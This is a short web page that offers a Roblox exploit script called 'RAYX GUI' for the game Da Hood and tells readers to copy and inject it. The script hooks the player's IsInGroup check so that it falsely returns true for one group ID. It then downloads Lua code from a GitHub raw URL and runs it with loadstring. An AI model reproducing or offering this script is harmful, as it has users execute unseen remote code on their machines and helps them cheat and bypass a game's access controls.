All content on our site is free and will always be free.

Please consider supporting us with disabling your AdBlock software and to gain access to thousands of free content!

Not sure how to disable AdBLock? Follow this tutorial: How to disable AdBlock

Get the RAYX GUI

The RAYX GUI code is below. Copy & inject it into the game. Enjoy!

Da Hood - idk
local old = game:GetService("Players").LocalPlayer.IsInGroup

hookfunction(game:GetService("Players").LocalPlayer.IsInGroup, newcclosure(function(self, id)
if id == 12271076 then
return true
end
return old(self, id)
end))

loadstring(game:HttpGet('https://raw.githubusercontent.com/SpaceYes/Lua/Main/DaHood.Lua'))()